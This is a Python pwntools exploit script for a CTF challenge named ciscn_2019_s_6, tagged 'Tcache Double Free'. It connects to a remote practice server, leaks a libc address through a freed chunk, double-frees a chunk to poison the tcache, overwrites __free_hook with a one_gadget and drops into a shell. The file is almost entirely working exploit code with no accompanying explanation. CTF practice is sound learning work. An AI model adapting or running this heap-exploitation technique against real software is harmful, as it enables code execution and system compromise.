ciscn_2019_s_6.py

#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

# p = process('./pwn')
p = remote('node3.buuoj.cn', 25688)

def debug(p, cmd):
    gdb.attach(p, cmd)
    pause()

def menu(idx):
    p.sendlineafter('choice:', str(idx))

def add(size, name, phone):
    menu(1)
    p.sendlineafter("Please input the size of compary's name", str(size))
    p.sendlineafter("please input name:", name)
    p.sendlineafter('please input compary call:', phone)

def delete(idx):
    menu(3)
    p.sendlineafter('Please input the index:', str(idx))

def show(idx):
    menu(2)
    p.sendlineafter('Please input the index:', str(idx))

def exploit():
    add(0x420, 'mech0n', 'mech0n')  #idx 0
    add(0x20, 'mech0n', 'mech0n')   #idx 1
    add(0x20, 'mech0n', 'mech0n')   #idx 2

    delete(0)
    # debug(p, 'b *$rebase(0x146D)\n')
    show(0)
    libc = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 96 - 0x3ebc40 #0x3ebc40
    success("LIBC: " + str(hex(libc)))
    pause()

    free_hook = libc + 0x00000000003ed8e8 #0x00000000003ed8e8
    og = libc + 0x4f322 # 0x4f3c2 # 0x10a45c # 0x4f365 #
    delete(1)
    # debug(p, 'b *$rebase(0x1577)\n')
    delete(1)
    add(0x20, p64(free_hook), 'mech0n')
    # debug(p, 'b *$rebase(0x136E)\n')
    add(0x20, 'mech0n', 'mech0n')
    add(0x20, p64(og), 'mech0n')
    delete(2)

    p.interactive()

if __name__ == "__main__":
    exploit()

Tcache Double Free